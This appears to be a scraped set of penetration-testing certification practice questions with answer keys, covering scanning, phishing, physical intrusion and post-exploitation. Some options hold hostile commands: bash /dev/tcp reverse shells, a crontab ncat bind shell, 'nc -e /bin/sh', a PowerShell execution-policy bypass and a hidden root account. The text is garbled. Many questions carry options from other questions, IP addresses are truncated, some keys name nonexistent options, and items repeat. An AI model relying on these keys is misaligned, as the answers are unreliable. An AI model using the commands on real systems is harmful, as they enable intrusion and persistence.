Question #1
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
A. See explanation below
Correct answer: A
Question #2
Deconfliction is necessary when the penetration test:
A. determines that proprietary information is being stored in cleartext
B. occurs during the monthly vulnerability scanning
C. uncovers indicators of prior compromise over the course of the assessment
D. proceeds in parallel with a criminal digital forensic investigation
Correct answer: D
Question #3
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Correct answer: C
Question #4
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?
A. Attempting to tailgate an employee who is going into the client's workplace
B. Dropping a malicious USB key with the company's logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Correct answer: D
Question #5
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
Correct answer: C
Question #6
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Correct answer: B
Question #7
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?
A. Check the scoping document to determine if exfiltration is within scope
B. Stop the penetration test
C. Escalate the issue
D. Include the discovery and interaction in the daily report
Correct answer: C
Question #8
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
Correct answer: A
Question #9
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Correct answer: B
Question #10
The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device?
A. Clarify the statement of work
B. Obtain an asset inventory from the client
C. Interview all stakeholders
D. Identify all third parties involved
Correct answer: B
Question #11
The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS?
A. Line 01
B. Line 02
C. Line 07
D. Line 08
E. Line 12
Correct answer: A
Question #12
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords
Correct answer: D
Question #13
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened?
A. The penetration tester was testing the wrong assets
B. The planning process failed to ensure all teams were notified
C. The client was not ready for the assessment to start
D. The penetration tester had incorrect contact information
Correct answer: B
Question #14
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
C. nmap -sA -v -O 192
D. nmap -sS -O 192
Correct answer: D
Question #15
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
Correct answer: C
Question #16
A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)
A. Clickjacking
B. Session hijacking
C. Parameter pollution
D. Cookie hijacking
E. Cross-site scripting
Correct answer: CD
Question #17
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
A. Maximizing the likelihood of finding vulnerabilities
B. Deprioritizing the goals/objectives
C. Eliminating the potential for false positives
D. Reducing the risk to the client environment
Correct answer: B
Question #18
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
A. Sniff and then crack the WPS PIN on an associated WiFi device
B. Dump the user address book on the device
C. Break a connection between two Bluetooth devices
D. Transmit text messages to the device
Correct answer: A
Question #19
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations
Correct answer: D
Question #20
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback
B. Download
C. Edit the smb
D. Download the smb
Correct answer: C
Question #21
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB
Correct answer: D
Question #22
HOTSPOT (Drag and Drop is not supported) You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTION Giving the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. Hot Area:
A. See Explanation section for answer
Correct answer: A
Question #23
A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?
A. nmap -iL results 192
B. nmap 192
C. nmap -A 192
D. nmap 192
Correct answer: C
Question #24
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
A. Steganography
B. Metadata removal
C. Encryption
D. Encode64
Correct answer: A
Question #25
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Correct answer: B
Question #26
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script
B. chmod u+e script
C. chmod o+e script
D. chmod o+x script
Correct answer: A
Question #27
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
A. Smurf
B. Ping flood
C. Fraggle
D. Ping of death
Correct answer: C
Question #28
Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
A. After detection of a breach
B. After a merger or an acquisition
C. When an organization updates its network firewall configurations
D. When most of the vulnerabilities have been remediated
Correct answer: B
Question #29
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Correct answer: A
Question #30
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
A. Delete the scheduled batch job
B. Close the reverse shell connection
C. Downgrade the svsaccount permissions
D. Remove the tester-created credentials
Correct answer: D
Question #31
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?
A. Hashcat
B. Mimikatz
C. Patator
D. John the Ripper
Correct answer: C
Question #32
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
Correct answer: D
Question #33
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)
A. SOW
B. SLA
C. ROE
D. NDA
Correct answer: BC
Question #34
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
A. Add a dependency checker into the tool chain
B. Perform routine static and dynamic analysis of committed code
C. Validate API security settings before deployment
D. Perform fuzz testing of compiled binaries
Correct answer: A
Question #35
An Nmap scan of a network switch reveals the following: Which of the following technical controls will most likely be the FIRST recommendation for this device?
A. Encrypted passwords
B. System-hardening techniques
C. Multifactor authentication
D. Network segmentation
Correct answer: B
Question #36
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
A. Wait for the next login and perform a downgrade attack on the server
B. Capture traffic using Wireshark
C. Perform a brute-force attack over the server
D. Use an FTP exploit against the server
Correct answer: B
Question #37
Appending string values onto another string is called:
A. Compilation
B. Connection
C. Concatenation
D. Conjunction
Correct answer: C
Question #38
A compliance-based penetration test is primarily concerned with:
A. obtaining PII from the protected network
B. bypassing protection on edge devices
C. determining the efficacy of a specific set of security standards
D. obtaining specific information from the protected network
Correct answer: C
Question #39
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. Web archive
B. GitHub
C. File metadata
D. Underground forums
Correct answer: A
Question #40
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
A. nc 10
B. powershell -exec bypass -f \\\\10
C. bash -i >& /dev/tcp/10
D. wget 10
Correct answer: A
Question #41
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
A. devices produce more heat and consume more power
B. devices are obsolete and are no longer available for replacement
C. protocols are more difficult to understand
D. devices may cause physical world effects
Correct answer: D
Question #42
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
Correct answer: A
Question #43
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?
A. The HTTP port is not open on the firewall
B. The tester did not run sudo before the command
C. The web server is using HTTPS instead of HTTP
D. This URI returned a server error
Correct answer: D
Question #44
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
A. Run an application vulnerability scan and then identify the TCP ports used by the application
B. Run the application attached to a debugger and then review the application's log
C. Disassemble the binary code and then identify the break points
D. Start a packet capture with Wireshark and then run the application
Correct answer: D
Question #45
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following combinations of tools would the penetration tester use to exploit this script?
A. Hydra and crunch
B. Netcat and cURL
C. Burp Suite and DIRB
D. Nmap and OWASP ZAP
Correct answer: B
Question #46
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them
B. Scripts that are part of the framework can be imported directly into SIEM tools
C. The methodology can be used to estimate the cost of an incident better
D. The framework is static and ensures stability of a security program over time
Correct answer: A
Question #47
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
A. Tailgating
B. Dumpster diving
C. Shoulder surfing
D. Badge cloning
Correct answer: D
Question #48
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. Edit the discovered file with one line of code for remote callback
B. Download
C. Edit the smb
D. Download the smb
Correct answer: AC
Question #49
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network. Which of the following methods will MOST likely work?
A. Try to obtain the private key used for S/MIME from the CEO's account
B. Send an email from the CEO's account, requesting a new account
C. Move laterally from the mail server to the domain controller
D. Attempt to escalate privileges on the mail server to gain root access
Correct answer: D
Question #50
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. security compliance regulations or laws may be violated
B. testing can make detecting actual APT more challenging
C. testing adds to the workload of defensive cyber- and threat-hunting teams
D. business and network operations may be impacted
Correct answer: D
Question #51
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. security compliance regulations or laws may be violated
B. testing can make detecting actual APT more challenging
C. testing adds to the workload of defensive cyber- and threat-hunting teams
D. business and network operations may be impacted
Correct answer: D
Question #52
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
A. Specially craft and deploy phishing emails to key company leaders
B. Run a vulnerability scan against the company's external website
C. untime the company's vendor/supply chain
D. Scrape web presences and social-networking sites
Correct answer: D
Question #53
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
A. Asset inventory
B. DNS records
C. Web-application scan
D. Full scan
Correct answer: A
Question #54
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
A. Send deauthentication frames to the stations
B. Perform jamming on all 2
C. Set the malicious AP to broadcast within dynamic frequency selection channels
D. Modify the malicious AP configuration to not use a preshared key
Correct answer: C
Question #55
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891. Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10
B. powershell -exec bypass -f \\10
C. bash -i >& /dev/tcp/10
D. wget 10
Correct answer: D
Question #56
A penetration tester captured the following traffic during a web-application test: Which of the following methods should the tester use to visualize the authorization information being transmitted?
A. Decode the authorization header using UTF-8
B. Decrypt the authorization header using bcrypt
C. Decode the authorization header using Base64
D. Decrypt the authorization header using AES
Correct answer: C
Question #57
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
A. schtasks /create /sc /ONSTART /tr C:\\Temp|WindowsUpdate
B. wmic startup get caption,command
C. (crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
Correct answer: A
Question #58
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
A. Analyze the malware to see what it does
B. Collect the proper evidence and then remove the malware
C. Do a root-cause analysis to find out how the malware got in
D. Remove the malware immediately
E. Stop the assessment and inform the emergency contact
Correct answer: E
Question #59
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
A. SQLmap
B. DirBuster
C. w3af
D. OWASP ZAP
Correct answer: D
Question #60
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP
Correct answer: C
Question #61
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Correct answer: B
Question #62
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted dat
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Correct answer: A
Question #63
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to defin
A. Establish the format required by the client
B. Establish the threshold of risk to escalate to the client immediately
C. Establish the method of potential false positives
D. Establish the preferred day of the week for reporting
Correct answer: B
Question #64
A penetration tester obtained the following results after scanning a web server using the dirb utility: Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index
B. about
C. info
D. home
Correct answer: B
Question #65
A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. Familiarity and likeness
B. Authority and urgency
C. Scarcity and fear
D. Social proof and greed
Correct answer: B
Question #66
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
A. Acceptance by the client and sign-off on the final report
B. Scheduling of follow-up actions and retesting
C. Attestation of findings and delivery of the report
D. Review of the lessons during the engagement
Correct answer: A
Question #67
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing
Correct answer: C
Question #68
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
A. Halt the penetration test
B. Conduct an incident response
C. Deconflict with the penetration tester
D. Assume the alert is from the penetration test
Correct answer: C
Question #69
A penetration tester gains access to a system and is able to migrate to a user process: Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
A. The tester input the incorrect IP address
B. The command requires the -port 135 option
C. An account for RDP does not exist on the server
D. PowerShell requires administrative privilege
Correct answer: CD
Question #70
Which of the following expressions in Python increase a variable val by one? (Choose two.)
A. nmap -T3 192
B. nmap -P0 192
C. nmap -T0 192
D. nmap -A 192
Correct answer: CF
Question #71
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
Correct answer: A
Question #72
SIMULATION You are a penetration tester reviewing a client's website through a web browser. INSTRUCTIONS Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. See explanation below
Correct answer: A
Question #73
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices
B. Disregard the IP range, as it is out of scope
C. Stop the assessment and inform the emergency contact
D. Scan the IP range for additional systems to exploit
Correct answer: C
Question #74
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A. Weak authentication schemes
B. Credentials stored in strings
C. Buffer overflows
D. Non-optimized resource management
Correct answer: C
Question #75
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script
B. chmod u+e script
C. chmod o+e script
D. chmod o+x script
Correct answer: A
Question #76
A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
A. Forensically acquire the backdoor Trojan and perform attribution
B. Utilize the backdoor in support of the engagement
C. Continue the engagement and include the backdoor finding in the final report
D. Inform the customer immediately about the backdoor
Correct answer: D
Question #77
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended?
A. Change line 2 to $ip= "10
B. Remove lines 3, 5, and 6
C. Remove line 6
D. Move all the lines below line 7 to the top of the script
Correct answer: A
Question #78
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
Correct answer: C
Question #79
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use for further progress into the targeted network?
A. nc 10
B. ssh 10
C. nc 127
D. ssh 127
Correct answer: C
Question #80
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A. Create a one-shot system service to establish a reverse shell
B. Obtain /etc/shadow and brute force the root password
C. Run the nc -e /bin/sh <…> command
D. Move laterally to create a user account on LDAP
Correct answer: A
Question #81
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment?
A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing
Correct answer: C
Question #82
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?
A. The timing of the scan
B. The bandwidth limitations
C. The inventory of assets and versions
D. The type of scan
Correct answer: C
Question #83
A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. Familiarity and likeness
B. Authority and urgency
C. Scarcity and fear
D. Social proof and greed
Correct answer: B
Question #84
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Correct answer: A
Question #85
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory
B. This device is most likely a gateway with in-band management services
C. This device is most likely a proxy server forwarding requests over TCP/443
D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation
Correct answer: BE
Question #86
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
A. Run nmap with the -O, -p22, and -sC options set against the target
B. Run nmap with the -sV and -p22 options set against the target
C. Run nmap with the --script vulners option set against the target
D. Run nmap with the -sA option set against the target
Correct answer: D
Question #87
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. nmap 192
B. nmap 192
C. nmap 192
D. nmap 192
Correct answer: C
Question #88
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct answer: C